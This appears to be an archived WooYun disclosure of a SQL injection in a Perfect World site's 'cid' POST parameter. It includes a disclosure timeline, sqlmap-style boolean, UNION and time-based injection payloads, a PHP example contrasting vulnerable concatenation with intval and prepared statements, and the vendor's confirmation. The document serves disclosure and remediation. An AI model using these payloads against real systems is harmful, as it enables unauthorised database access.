WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online browsing--------http://drop.zone.ci/
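2015-05-13: Details reported to the vendor, awaiting vendor handling
2015-05-14: Vendor confirmed; details disclosed to the vendor only
2015-05-24: Details disclosed to core white hats and experts in related fields
2015-06-03: Details disclosed to regular white hats
2015-06-13: Details disclosed to trainee white hats
2015-06-28: Details disclosed to the public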
Came across it by accident.
Parameter: cid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1 AND 3022=3022

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: cid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7171,0x57545371584357714d6d,0x716a6a7a71),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=1 AND SLEEP(5)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
intval
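The suggested fix above is `intval`. The following is an added example, not code from the affected application: the `category` table, its rows and the function names are constructed, and in-memory SQLite stands in for the MySQL back end. It compares a concatenated `cid`, the `intval` cast, and strict integer validation with a bound parameter.

```php
<?php
// Added example. Schema, rows and function names are constructed for illustration;
// the page does not show the application's real query.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE category (cid INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO category VALUES (1, 'public'), (2, 'internal')");

// Vulnerable pattern: the POST value becomes part of the SQL text,
// so anything after the number is parsed by the database.
function findConcatenated(PDO $db, string $cid): array
{
    return $db->query("SELECT name FROM category WHERE cid = $cid")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// The suggested fix: intval() keeps only the leading digits, so the query
// is safe, but malformed input is silently treated as a valid id.
function findIntval(PDO $db, string $cid): array
{
    $id = intval($cid);
    return $db->query("SELECT name FROM category WHERE cid = $id")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Stricter variant: reject anything that is not a positive integer and
// bind the value, so the statement text never contains user input.
function findStrict(PDO $db, string $cid): array
{
    $id = filter_var($cid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('cid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT name FROM category WHERE cid = :cid');
    $stmt->bindValue(':cid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// First two values: a normal id and the boolean payload quoted on this page.
// The third is a constructed false counterpart that shows the appended
// condition is evaluated only in the concatenated query.
$inputs = ['1', '1 AND 3022=3022', '1 AND 3022=3023'];

foreach ($inputs as $cid) {
    try {
        $strict = json_encode(findStrict($db, $cid));
    } catch (InvalidArgumentException $e) {
        $strict = 'rejected';
    }
    printf(
        "%-18s concatenated=%-12s intval=%-12s strict=%s\n",
        $cid,
        json_encode(findConcatenated($db, $cid)),
        json_encode(findIntval($db, $cid)),
        $strict
    );
}
```

Rejected values are also a useful detection signal: a `cid` that fails integer validation is worth logging with the source address.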
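Severity: High
Vulnerability Rank: 15
Confirmed: 2015-05-14 11:02
It is indeed fairly well hidden. Thank you for your attention to Perfect World; we will fix the vulnerability as soon as possible. Thanks!
None yet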